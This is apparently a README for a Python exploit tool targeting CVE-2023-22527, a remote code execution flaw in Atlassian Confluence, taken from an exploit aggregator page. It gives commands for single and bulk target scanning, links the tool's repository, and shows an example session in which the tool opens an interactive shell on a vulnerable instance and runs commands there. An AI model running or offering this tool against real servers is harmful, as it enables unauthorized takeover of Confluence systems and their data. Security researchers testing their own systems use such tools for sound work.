## https://sploitus.com/exploit?id=BD6E5E50-E5E8-5FBB-8D0C-F9DD7FCDDFAE
# Atlassian Confluence CVE-2023-22527 Scanner
## Overview
This tool scans for CVE-2023-22527, a critical vulnerability in Atlassian Confluence that allows unauthorized remote code execution (RCE).
## Features
- **Single URL Scan**: Scan a specific target for the vulnerability.
- **Bulk Scan**: Process multiple URLs from a file for efficient vulnerability assessment.
- **Concurrency Control**: Utilize threading for faster bulk scanning.
- **Output Logging**: Save vulnerable URLs to a specified file.
## Usage
1. **Single URL Scan**: `python exploit.py -u <URL>`
2. **Bulk Scan**: `python exploit.py -f <file_path>`
3. **Set Threads**: `python exploit.py -t <number_of_threads>`
4. **Output File**: `python exploit.py -o <output_file_path>`
## Requirements
- Python 3.10+
- Dependencies: `requests`, `prompt_toolkit`, `rich`, `alive_progress`
## Installation
1. Clone the repository: `git clone https://github.com/Chocapikk/CVE-2023-22527`
2. Install dependencies: `pip install -r requirements.txt`
## Example
```bash
$ python3 exploit.py -u http://localhost:8092
[+] http://localhost:8092 is vulnerable - confluence
[!] Shell is ready, please type your commands UwU
$ id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
$ pwd
/var/atlassian/application-data/confluence
$ hostname
ff7bfe2e7109
```
## Disclaimer
This tool is intended for security research and should only be used on systems with explicit authorization. Misuse may lead to legal consequences.
## More Information
For more detailed information about the CVE-2023-22527 vulnerability, refer to the [Project Discovery Blog Post](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/).